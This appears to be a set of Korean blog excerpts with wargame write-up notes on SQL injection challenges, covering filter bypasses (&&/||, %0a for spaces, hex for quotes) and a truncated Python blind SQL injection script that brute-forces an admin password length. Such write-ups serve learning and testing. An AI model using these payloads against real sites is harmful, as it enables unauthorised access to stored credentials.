BIGFROG

and, or이 필터링이므로 &&, ||로 사용 가능

공백을 못쓰니까 %0a로 해결

패스워드를 맞추면 되는 문제 필터는 prob _ . ( ) + 대소문자 구분 X(i옵션) PW를 맞춰야 하므로 blind sqli 길이를 먼저 맞춰야 한다. 이 부분은 파이썬으로 짜는게 빠르다. import requests COOKIE = {'PHPSESSID': ''} url = 'https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?' for i in range(1,20): query = f"pw=1' or id='admin' and length(pw)={i} %23" if 'Hello admin' in requests.get(url+query, cookies=COOKIE).text: print("password length : ",..

filter : prob _ . ( ) ' " ` +대소문자 구분 X id를 admin으로 바꿔주면 된다. '가 필터링에 걸려있으니 id='admin'은 사용하지 못한다. '를 대신할 수 있는 방법으로 hex값으로 바꿔 넣어줄 수 있다.